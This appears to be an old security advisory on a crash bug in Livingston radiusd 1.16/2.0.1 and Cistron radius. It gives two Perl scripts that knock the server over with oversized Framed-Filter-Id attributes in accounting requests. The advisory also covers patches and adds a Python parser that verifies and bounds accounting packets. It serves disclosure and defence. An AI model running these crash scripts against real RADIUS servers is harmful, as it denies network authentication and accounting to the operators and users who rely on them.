COMMAND

    radiusd

SYSTEMS AFFECTED

    Systems  running  radiusd  (livingston,  1.16  and  2.0.1 97/5/22,
    cistron's radius)

PROBLEM

    Hamdi Tounsi found the following.  The code below will crash radiusd
    from Livingston, 1.16 and 2.0.1 97/5/22.  One important point is
    that you don't need the shared secret between the RADIUS server and
    its clients to crash it, since the accounting server will try to
    log the accounting request (though it will flag it as unverified).
    Of course, you need to be listed in the clients config file to be
    able to send an accounting request (otherwise spoof).  Crash code
    follows:

    #!/usr/bin/perl
    use Authen::RadiusAcct;
    $r = new Authen::RadiusAcct(Host => 'your.radius.server:1646', Secret => 'any_string');
    $r->load_dictionary;
    $r->add_attributes(
            {Name => 'User-Name', Value => 'anyuser'},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            );
    $r->send_packet(4);   # code 4 = Accounting-Request

    Cistron's radius is also vulnerable to the radius crasher since it
    is derived from livingston's radius 1.16.  The code is simpler:

    #!/usr/bin/perl
    use Authen::RadiusAcct;
    $r = new Authen::RadiusAcct(Host => 'radiushost:1646', Secret => 'any_secret');
    $r->load_dictionary;
    $r->add_attributes(
            {Name => 'User-Name', Value => 'dummy'},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A4096','A')},
            );

    $r->send_packet(4);   # code 4 = Accounting-Request

SOLUTION

    A patch for RADIUS Server 2.0.1 is available at:

        ftp://ftp.livingston.com/pub/le/radius/

    Note that people  running very old  versions of ComOS  that didn't
    sign accounting  packets will  need to  upgrade their  ComOS to at
    least release  3.3.1 before  applying this  patch to  their RADIUS
    server, if they want to keep using RADIUS Accounting.  There's  no
    patch for  RADIUS 1.16;  anyone who  owns a  Livingston PortMaster
    should upgrade to RADIUS 2.0.1 at:

        http://www.livingston.com/Forms/radiusform.cgi

    and then apply this patch.
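
    The ComOS note above implies that accounting packets must be signed.
    The following is an added example, not code from this advisory or
    from Livingston's patch: it checks the RFC 2866 Request Authenticator
    and bounds every attribute before any request data reaches the log.
    All function names and the sample secret are hypothetical.

```python
import hashlib
import hmac
import struct

ACCOUNTING_REQUEST = 4   # RADIUS code, the value passed to send_packet() above
HEADER_LEN = 20          # code(1) + id(1) + length(2) + authenticator(16)
MAX_PACKET_LEN = 4096    # largest RADIUS packet allowed by RFC 2865

def acct_authenticator(header4, attrs, secret):
    """RFC 2866: MD5(code + id + length + 16 zero octets + attributes + secret)."""
    return hashlib.md5(header4 + bytes(16) + attrs + secret).digest()

def build_acct_request(ident, attrs, secret):
    """Build a signed Accounting-Request from (type, value) pairs (test input)."""
    body = b"".join(bytes([t, len(v) + 2]) + v for t, v in attrs)
    head = struct.pack("!BBH", ACCOUNTING_REQUEST, ident, HEADER_LEN + len(body))
    return head + acct_authenticator(head, body, secret) + body

def parse_acct_request(datagram, secret):
    """Return [(type, value), ...]; raise ValueError before anything is logged."""
    if not HEADER_LEN <= len(datagram) <= MAX_PACKET_LEN:
        raise ValueError("datagram size out of range")
    code, _ident, length = struct.unpack("!BBH", datagram[:4])
    if code != ACCOUNTING_REQUEST:
        raise ValueError("not an Accounting-Request")
    if not HEADER_LEN <= length <= len(datagram):
        raise ValueError("length field disagrees with datagram")
    pkt = datagram[:length]            # octets past Length are padding
    expected = acct_authenticator(pkt[:4], pkt[HEADER_LEN:], secret)
    if not hmac.compare_digest(expected, pkt[4:HEADER_LEN]):
        raise ValueError("unverified request: authenticator mismatch")
    attrs, pos = [], HEADER_LEN
    while pos < length:                # bounded walk over the attribute list
        if length - pos < 2:
            raise ValueError("truncated attribute header")
        atype, alen = pkt[pos], pkt[pos + 1]
        if alen < 2 or pos + alen > length:
            raise ValueError("attribute length overruns packet")
        attrs.append((atype, pkt[pos + 2:pos + alen]))
        pos += alen
    return attrs

# Constructed sample: User-Name (1) plus sixteen 127-octet type-11 attributes,
# the shape of the first script above, signed with a constructed secret.
SAMPLE_ATTRS = [(1, b"anyuser")] + [(11, b"C".ljust(127))] * 16
SAMPLE = build_acct_request(7, SAMPLE_ATTRS, b"constructed-secret")
```

    A request signed with the wrong secret is rejected before the
    attribute walk runs, so nothing from it is ever formatted or logged.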